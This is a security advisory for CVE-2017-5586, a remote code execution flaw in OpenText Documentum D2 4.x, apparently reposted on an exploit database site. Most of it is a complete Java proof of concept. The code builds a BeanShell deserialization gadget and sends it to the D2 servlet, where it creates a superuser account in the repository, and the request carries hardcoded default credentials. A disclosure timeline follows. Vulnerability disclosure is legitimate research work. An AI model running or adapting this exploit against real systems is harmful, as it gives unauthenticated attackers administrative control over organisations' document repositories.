###########################

# OpenText Documentum D2 4.x Remote Code Execution Vulnerability

###########################

CVE Identifier: CVE-2017-5586
Vendor: OpenText
Affected products: Documentum D2 version 4.x
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Description: Document D2 contains vulnerable BeanShell (bsh) and Apache Commons libraries and accepts serialised data from untrusted sources, which leads to remote code execution

Proof of concept:

===================================8<===========================================


import java.io.ByteArrayOutputStream;
import java.io.DataOutputStream;
import java.io.InputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.ArrayList;
import java.util.Comparator;
import java.util.List;
import java.util.PriorityQueue;


import bsh.Interpreter;
import bsh.XThis;


import com.documentum.fc.client.content.impl.ContentStoreResult;
import com.documentum.fc.client.impl.typeddata.TypedData;


/**
 * @author Andrey B. Panfilov <andrey@panfilov.tel>
 *
 * Code below creates superuser account in underlying Documentum repository
 * usage: java DocumentumD2BeanShellPoc http://host:port/D2 <docbase_name> <user_name_to_create>
 *
 */
@SuppressWarnings("unchecked")
public class DocumentumD2BeanShellPoc {


  public static void main(String[] args) throws Exception {
    String url = args[0];
    String docbase = args[1];
    String userName = args[2];
    String payload = "compare(Object foo, Object bar) {new Interpreter()"
        + ".eval(\"try{com.documentum.fc.client.IDfSession session = com.documentum.fc.impl.RuntimeContext.getInstance()"
        + ".getSessionRegistry().getAllSessions().iterator().next();"
        + "session=com.emc.d2.api.D2Session.getAdminSession(session, false);"
        + "com.documentum.fc.client.IDfQuery query = new com.documentum.fc.client.DfQuery("
        + "\\\"CREATE dm_user object set user_name='%s',set user_login_name='%s',set user_source='inline password', "
        + "set user_password='%s', set user_privileges=16\\\");query.execute(session, 3);} "
        + "catch (Exception e) {}; return 0;\");}";
    Interpreter interpreter = new Interpreter();
    interpreter.eval(String.format(payload, userName, userName, userName));
    XThis x = new XThis(interpreter.getNameSpace(), interpreter);
    Comparator comparator = (Comparator) x.getInterface(new Class[] { Comparator.class, });
    PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
    Object[] queue = new Object[] { 1, 1 };
    setFieldValue(priorityQueue, "queue", queue);
    setFieldValue(priorityQueue, "size", 2);


    // actually we may send priorityQueue directly, but I want to hide
    // deserialization stuff from stacktrace :)
    Class cls = Class.forName("com.documentum.fc.client.impl.typeddata.ValueHolder");
    Constructor ctor = cls.getConstructor();
    ctor.setAccessible(true);


    Object valueHolder = ctor.newInstance();
    setFieldValue(valueHolder, "m_value", priorityQueue);
    List valueHolders = new ArrayList();
    valueHolders.add(valueHolder);


    TypedData data = new TypedData();
    setFieldValue(data, "m_valueHolders", valueHolders);


    ContentStoreResult result = new ContentStoreResult();
    setFieldValue(result, "m_attrs", data);


    ByteArrayOutputStream baos = new ByteArrayOutputStream();
    DataOutputStream dos = new DataOutputStream(baos);
    for (Character c : "SAVED".toCharArray()) {
      dos.write(c);
    }
    dos.write((byte) 124);
    dos.flush();
    ObjectOutputStream oos = new ObjectOutputStream(baos);
    oos.writeObject(result);
    oos.flush();
    byte[] bytes = baos.toByteArray();
    baos = new ByteArrayOutputStream();
    dos = new DataOutputStream(baos);
    dos.writeInt(bytes.length);
    dos.write(bytes);
    dos.flush();
    HttpURLConnection conn = (HttpURLConnection) new URL(makeUrl(url)).openConnection();
    conn.setRequestProperty("Content-Type", "application/octet-stream");
    conn.setRequestMethod("POST");
    conn.setUseCaches(false);
    conn.setDoOutput(true);
    conn.getOutputStream().write(baos.toByteArray());
    conn.connect();
    System.out.println("Response code: " + conn.getResponseCode());
    InputStream stream = conn.getInputStream();
    byte[] buff = new byte[1024];
    int count = 0;
    while ((count = stream.read(buff)) != -1) {
      System.out.write(buff, 0, count);
    }
  }


  public static String makeUrl(String url) {
    if (!url.endsWith("/")) {
      url += "/";
    }
    return url + "servlet/DoOperation?origD2BocsServletName=Checkin&id=1&file=/etc/passwd&file_length=1000"
        + "&_username=dmc_wdk_preferences_owner&_password=webtop";
  }


  public static Field getField(final Class<?> clazz, final String fieldName) throws Exception {
    Field field = clazz.getDeclaredField(fieldName);
    if (field == null && clazz.getSuperclass() != null) {
      field = getField(clazz.getSuperclass(), fieldName);
    }
    field.setAccessible(true);
    return field;
  }


  public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
    final Field field = getField(obj.getClass(), fieldName);
    field.set(obj, value);
  }


}


===================================>8===========================================



Disclosure timeline:

2016.02.28: Vulnerability discovered
2017.01.25: CVE Identifier assigned
2017.02.01: Vendor contacted, no response
2017.02.15: Public disclosure


__
Regards,
Andrey B. Panfilov

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2017-02-17]

###########################